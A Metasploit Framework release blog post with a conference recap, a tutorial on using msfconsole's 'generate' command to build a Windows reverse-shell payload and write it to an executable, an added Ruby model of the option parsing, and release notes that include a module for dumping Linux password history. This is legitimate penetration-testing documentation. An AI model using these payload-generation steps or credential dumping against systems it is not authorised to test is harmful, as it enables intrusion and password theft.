Hacker Summer Camp

Last week, the Metasploit team flew out to sunny, hot, and dry Las Vegas for Hacker Summer Camp (Black Hat, BSidesLV, and DEF CON). It was a full week of epic hacks, good conversation, and even a little business!

If you managed to catch us at our Open Source Office Hours (previously
OSSM, the Open Source Security Meetup) in Bally's, we just wanted to say
thanks for making the trek through the Las Vegas sun to come see us!

In between Vegas and the Exploit That Shall Not Be Named, we've been
steadily at work enhancing modules, the console, and fixing bugs for
this release.

msfvenom in my msfconsole?

Back in June of last year, we aligned the options for msfconsole's
generate command with msfvenom's options. Since the change was
subtle and may not have been picked up by the various tutorials on the
Net, this will be a quick recap on how to use the new-ish options.

If you're on Metasploit 5, please continue reading! If not, you can
continue to use the old invocation. :-)

Run help generate to see the new usage for the generate command.

msf5 payload(windows/shell_reverse_tcp) > help generate
Usage: generate [options]

Generates a payload. Datastore options may be supplied after normal options.

Example: generate -f python LHOST=127.0.0.1

OPTIONS:

    -E        Force encoding
    -O <opt>  Deprecated: alias for the '-o' option
    -P <opt>  Total desired payload size, auto-produce appropriate NOP sled length
    -S <opt>  The new section name to use when generating (large) Windows binaries
    -b <opt>  The list of characters to avoid example: '\x00\xff'
    -e <opt>  The encoder to use
    -f <opt>  Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
    -h        Show this message
    -i <opt>  The number of times to encode the payload
    -k        Preserve the template behavior and inject the payload as a new thread
    -n <opt>  Prepend a nopsled of [length] size on to the payload
    -o <opt>  The output file name (otherwise stdout)
    -p <opt>  The platform of the payload
    -x <opt>  Specify a custom executable file to use as a template
msf5 payload(windows/shell_reverse_tcp) >

Following the example in the usage, to specify datastore options in your
generate command, simply append them to the command line after normal
options.

msf5 payload(windows/shell_reverse_tcp) > generate -f python LHOST=127.0.0.1
# windows/shell_reverse_tcp - 324 bytes
# https://metasploit.com/
# VERBOSE=true, LHOST=127.0.0.1, LPORT=4444,
# ReverseAllowProxy=false, ReverseListenerThreaded=false,
# StagerRetryCount=10, StagerRetryWait=5,
# PrependMigrate=false, EXITFUNC=process, CreateSession=true
msf5 payload(windows/shell_reverse_tcp) >

What's even cooler is that generate will remember the datastore
options you gave it, allowing you to invoke it again with different
options, such as writing the payload to a file.

Here we demo writing the payload windows/shell_reverse_tcp to file
shell_reverse_tcp.exe without having to set LHOST again.

msf5 payload(windows/shell_reverse_tcp) > options

Module options (payload/windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

msf5 payload(windows/shell_reverse_tcp) > generate -f exe-only -o shell_reverse_tcp.exe
[*] Writing 73802 bytes to shell_reverse_tcp.exe...
msf5 payload(windows/shell_reverse_tcp) > file shell_reverse_tcp.exe
[*] exec: file shell_reverse_tcp.exe

shell_reverse_tcp.exe: PE32 executable (GUI) Intel 80386, for MS Windows
msf5 payload(windows/shell_reverse_tcp) >
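The option handling shown in the two sessions above, modelled as an added Ruby example (this is not Metasploit's own Rex::Parser::Arguments code): normal flags come first, any trailing KEY=VALUE word is a datastore option, and the datastore is remembered between generate calls, so the second call keeps LHOST. The GenerateCommand class name, the subset of flags and the sample datastore values are assumptions.

```ruby
require 'optparse'

# Simplified model of msfconsole's `generate` argument handling (an added
# illustration, not Metasploit's implementation). Flags are parsed first;
# leftover words must look like OPTION=value and go into the module datastore,
# which persists across invocations exactly like the sessions above.
class GenerateCommand
  DATASTORE_RE = /\A([A-Za-z_][A-Za-z0-9_]*)=(.*)\z/m

  attr_reader :datastore

  # datastore: values already set on the module (e.g. with `set LPORT 4444`)
  def initialize(datastore = {})
    @datastore = datastore
  end

  # Parse one `generate` command line. Returns the resolved flags plus a copy
  # of the datastore as it stands after this call.
  def parse(argv)
    opts = { format: 'raw', output: nil, encoder: nil, iterations: 1, badchars: '' }
    parser = OptionParser.new do |p|
      p.on('-f FORMAT')      { |v| opts[:format] = v }
      p.on('-o FILE')        { |v| opts[:output] = v }
      p.on('-O FILE')        { |v| opts[:output] = v } # deprecated alias for -o
      p.on('-e ENCODER')     { |v| opts[:encoder] = v }
      p.on('-i N', Integer)  { |v| opts[:iterations] = v }
      p.on('-b CHARS')       { |v| opts[:badchars] = v }
    end
    rest = parser.parse(argv) # words that are not flags are left over here
    rest.each do |word|
      m = DATASTORE_RE.match(word)
      raise ArgumentError, "expected OPTION=value, got #{word.inspect}" unless m
      @datastore[m[1].upcase] = m[2] # remembered for the next generate call
    end
    opts.merge(datastore: @datastore.dup)
  end
end

if __FILE__ == $PROGRAM_NAME
  cmd = GenerateCommand.new('LPORT' => '4444')           # constructed sample
  p cmd.parse(%w[-f python LHOST=127.0.0.1])
  p cmd.parse(%w[-f exe-only -o shell_reverse_tcp.exe])  # LHOST still present
end
```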

We hope you find these changes useful. Happy hacking!

Enhancements and features

  • PR #12161 - The linux/gather/hashdump module has been updated to gather password history information from /etc/security/opasswd.

Bugs fixed

  • PR #12202 - This adds the needs_cleanup attribute to post modules, fixing a crash when the attribute is used (such as in FileDropper) without being available.
  • PR #12199 - This replaces a backtrace with a friendly error message when the user specifies an invalid value for RHOSTS in an exploit module.
  • PR #12198 - This restores functionality from Metasploit 4 and earlier where payload-specific options to the generate command can be passed with -o. For parity with the msfvenom command, however, prefer simply specifying the options directly on Metasploit 5 and later.
  • PR #12188 - This fixes tools/modules/module_author.rb to use the renamed fullname value.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

We recently announced the release of Metasploit 5. You can get it by cloning the Metasploit Framework repo (master branch). To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial editions).